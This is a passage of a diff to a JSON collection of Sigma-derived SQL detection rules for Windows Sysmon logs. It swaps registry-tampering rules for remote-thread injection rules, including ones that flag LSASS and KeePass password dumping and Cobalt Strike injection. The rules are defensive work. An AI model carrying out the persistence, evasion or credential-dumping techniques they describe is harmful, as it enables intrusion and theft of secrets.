'%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Process Injection", + "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "status": "test", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND Details = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (Details LIKE '%.zip;%' ESCAPE '\\' OR Details LIKE '%.rar;%' ESCAPE '\\' OR Details LIKE '%.exe;%' ESCAPE '\\' OR Details LIKE '%.bat;%' ESCAPE '\\' OR Details LIKE '%.com;%' ESCAPE '\\' OR Details LIKE '%.cmd;%' ESCAPE '\\' OR Details LIKE '%.reg;%' ESCAPE '\\' OR Details LIKE '%.msi;%' ESCAPE '\\' OR Details LIKE '%.htm;%' ESCAPE '\\' OR Details LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((Details IN ('WINTRUST.DLL', 'mso.dll')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", - "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_file.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "author": "frack113", + "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject 